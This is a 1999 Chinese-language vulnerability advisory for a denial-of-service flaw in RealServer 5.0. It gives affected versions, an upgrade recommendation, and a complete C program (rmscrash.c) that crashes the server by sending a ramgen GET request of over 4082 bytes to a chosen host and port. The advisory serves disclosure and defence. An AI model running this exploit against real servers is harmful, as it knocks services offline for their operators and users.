RealServer 5.0 ramgen拒绝服务漏洞
发布日期:1999-12-23
更新日期:1999-12-24
受影响系统:Real Networks Real Server 5.0
不受影响系统:Real Networks Real Server 7.0
Real Networks Real Server G2 1.0
- Microsoft Windows NT 4.0
描述:
发送大于4082个字节的ramgen请求到RealServer 5.0,可以造成RealServer 5.0崩溃。通过重新启动RealServer软件可以恢复正常功能。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* rmscrash.c - bow@bow.net
*
* Crash a RealMedia 5.0 server by sending a very long ramgen request.
*
* Test on:
* $ pnserver -v
* Version: 5.0-rvserver-build-290
* Platform: FreeBSD-2.1.x
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define BUFLEN 4082
char buf[BUFLEN+14];
int sock;
struct sockaddr_in sa;
struct hostent *hp;
void main (int argc, char *argv[]) {
int i, port;
if (argc < 3) {
printf("Usage: %s realserver port\n",argv[0]);
exit(-1);
}
port = atoi(argv[2]);
memset(buf,0x41,BUFLEN);
memcpy(buf,"GET /ramgen/",12);
memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13);
if ((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");
exit(0);
}
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0);
}
sa.sin_family=AF_INET;
sa.sin_port=htons(port);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
perror("connect()");
exit(0);
}
printf("Connected to %s. Sending data\n",argv[1]);
write(sock,buf,strlen(buf));
printf("Done.\n");
close(sock);
exit(0);
}
建议:
升级到RealServer G2 or 7.0
浏览次数:7930
严重程度:0(网友投票)
